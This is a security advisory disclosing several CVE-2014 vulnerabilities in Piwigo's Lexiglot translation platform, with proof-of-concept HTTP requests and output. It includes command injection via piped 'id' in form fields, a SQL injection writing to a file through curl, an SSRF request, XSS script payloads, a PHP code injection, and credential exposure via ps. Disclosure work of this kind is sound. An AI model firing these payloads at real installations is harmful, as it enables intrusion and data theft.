Piwigo lexiglot multiple vulnerabilities

This advisory somehow slipped between the cracks, but hey, 4 years late is better than never…right?

About

Lexiglot is a translation platform for PHP projects developed in PHP. – http://piwigo.org/translate

Command injection

CVE-2014-8945

The username and password fields are vulnerable to command injection when adding a new project.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

name=test%7Cid&svn_url=http%3A%2F%2Fhost%3A8888%2Ftest%7Cid&svn_user=test%7Cid&svn_password=test%7Cid&files=1%2C2%2C3&rank=1&category_id=&add_project=Add

HTTP/1.1 200 OK
  string(53) "uid=33(www-data) gid=33(www-data) groups=33(www-data)"

SQL Injection

CVE-2014-8941 There are several SQL injection vulnerabilties in the project.

~# curl 'http://192.168.58.134/vvv/lexiglot/admin.php?page=users&from_id=-1"+union+select+"abc"+into+outfile+"/tmp/winrar"+--+-'

POST /vvv/lexiglot/admin.php?page=history HTTP/1.1
            Host: 192.168.58.134
            Proxy-Connection: keep-alive
            Content-Length: 79
            Cache-Control: max-age=0
            Accept:
            text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
            Origin: http://192.168.58.134
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
            like Gecko) Chrome/38.0.2125.111 Safari/537.36
            Content-Type: application/x-www-form-urlencoded
            Referer: http://192.168.58.134/vvv/lexiglot/admin.php
            Accept-Encoding: gzip,deflate
            Accept-Language: en-US,en;q=0.8
            Cookie: lexiglot_remember_me=2-1415751084-sV2wWGNLwVjAwGDxwhXcw4oemS8%3D;
            ck_login_id_20=1; ck_login_language_20=en_us;
            PHPSESSID=jqnd14cvtvddkf99t8d18ikr17

            user_id=-1&language=-1&project=-1&status=-1&limit=1'&search=Search

CSRF

CVE-2014-8942 The identified SQL injection can be exploited through CSRF

SSRF

CVE-2014-8943 The add a project page will request urls provided for a svn repository to ensure its a valid svn repository, an attacker can abuse this to make the server make requests on behalf of the attacker.

POST /vvv/lexiglot/admin.php?page=projects HTTP/1.1

            name=test&svn_url=http%3A%2F%2Fsecadvent.com%3A8888%2F&svn_user=test&svn_password=test&files=test&rank=1&category_id=&add_project=Add

            HTTP/1.1 200 OK
              string(132) "svn: OPTIONS of 'http://secadvent.com:8888': Could not read
              status line: connection was closed by server
             (http://secadvent.com:8888)"

Cross site scripting

CVE-2014-8944

There are both persistent and reflected xss in this project:

Reflected: Login with username a"><script>alert(1)</script>

Persistent: Through configuration interface, the install_name, intro_message and new_file_content parameters:

POST /vvv/lexiglot/admin.php?page=config HTTP/1.1
            Host: 192.168.58.134
            Proxy-Connection: keep-alive
            Content-Length: 435
            Cache-Control: max-age=0
            Accept:
            text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
            Origin: http://192.168.58.134
            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
            like Gecko) Chrome/38.0.2125.111 Safari/537.36
            Content-Type: application/x-www-form-urlencoded
            Referer: http://192.168.58.134/vvv/lexiglot/admin.php?page=config
            Accept-Encoding: gzip,deflate
            Accept-Language: en-US,en;q=0.8
            Cookie:
            lexiglot_remember_me=2-1415755982-4D8DIXhWWhJEXJnq8Z%2BmNBJ%2BhSQ%3D;
            ck_login_id_20=1; ck_login_language_20=en_us;
            PHPSESSID=v97mnbctl9hlkc0564cgu7r034
            X-FirePHP: 0.4.4
            X-FirePHP-Version: 0.4.4
            X-Wf-Max-Combined-Size: 262144

            install_name=Lexiglot&lt;script+src=xss>&intro_message=Welcome+on+your+new+installation+of+Lexiglot%21&lt;script+src+xss2>&default_language=en_UK&var_name=lang&use_stats=1&use_talks=1&access_to_guest=1&allow_registration=1&allow_profile=1&user_can_add_language=1&user_default_language=own&user_default_project=all&language_default_user=all&project_default_user=all&new_file_content=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%2F%2FWAT&save_config=Save

DoS

CVE-2014-8937 The api/update.php url is publicly accessible and will run svn update on all registered projects which consumes significant resources and ties up a web server thread. Multiple similtaneous requests to this url will cause resource exhaustion and render the web server inaccessible.

Local credential disclosure

CVE-2014-8938 The svn update function executes with username and password as command line arguments. In shared environments other users may be able to obtain these credentials by running the ps command:

~# ps auxw | grep svn
            www-data 27662  0.0  0.4  12792  3548 ?        S    20:17   0:00 svn checkout  http://host:8888/ ./local/test --revision HEAD --username test --password test

Local path disclosure

CVE-2014-8939 Local path is disclosed by the following urls if php is configured to display warnings: include/smarty/plugins/modifier.date_format.php

Information disclosure

CVE-2014-8940 An attacker can access the /update.log url to view all the projects that have been updated, this can be used to leverage the aforementioned DoS attack or to browse repository code as the projects are checked out to /local/projectname. Example:

~# GET
            http://localhost/vvv/lexiglot/update.log | head -1
            [2014-11-08T11:58:10+01:00] rotateimage
            ~# GET
            http://localhost/vvv/lexiglot/local/rotateimage | head -10
            &lt;title>Index of /vvv/lexiglot/local/rotateimage&lt;/title>

            &lt;img src="/icons/folder.gif" alt="[DIR]"> &lt;a href="ar_SA/">ar_SA/&lt;/a>

Solution

Upgrade to the latest version or seek an alternative as the vendor deemed some of these issue acceptable.